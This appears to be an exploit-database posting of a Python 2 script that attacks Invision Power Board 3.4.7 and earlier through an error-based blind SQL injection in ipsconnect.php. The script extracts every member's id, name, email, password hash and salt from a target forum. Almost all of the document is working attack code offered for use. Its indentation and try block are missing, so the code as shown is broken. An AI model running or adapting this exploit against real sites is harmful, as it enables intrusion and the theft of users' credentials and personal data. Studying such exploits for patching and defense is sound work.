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Invision Power Board 3.4.7 SQL Injection

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#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway@safe-mail.net
# IP.Board <= 3.4.7 SQLi (blind, error based);
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
# Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs
print '\n\n---------------------------------------------------------------------------------'
print 'Script Modified by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
print '---------Script has been modified for different table prefix XXX_members---------'
print '---------------------------------------------------------------------------------\n\n\n'
url = raw_input('Enter URL http://www.exmaple.com/path_to_ipb :: ')
url = url.rstrip('/')
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sys, re
import urllib2, urllib

def inject(sql):
urllib2.urlopen(urllib2.Request('%s/interface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and updatexml(NULL,concat (0x3a,(%s)),NULL)#\'' % sql), headers={"User-agent": ua}))
except urllib2.HTTPError, e:
if e.code == 503:
data = urllib2.urlopen(urllib2.Request('%s/cache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE)
if txt is not None:
return txt.group(1)
sys.exit('Error [3], received unexpected data:\n%s' % data)
sys.exit('Error [1]')
sys.exit('Error [2]')

def get(name, table, num):
sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
s = int(inject('LENGTH((%s))' % sqli))
if s < 31:
return inject(sqli)
r = ''
for i in range(1, s+1, 31):
r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
return r

members_table= inject('SeLecT table_name from information_schema.tables where table_schema=database() and table_name REGEXP 0x6d656d6265727324 limit 0,1')
n = inject('SELECT COUNT(*) FROM %s' % members_table)
print '----------------------------------------------------------------------------'
print '* Found %s users' % n
print '----------------------------------------------------------------------------'
for j in range(int(n)):
print '{:20s} {:20s}'.format('Id',get('member_id', members_table, j))
print '{:20s} {:20s}'.format('Name',get('name', members_table, j))
print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', members_table, j))
print '----------------------------------------------------------------------------'

Video: https://vimeo.com/111863081

Credit: Makman

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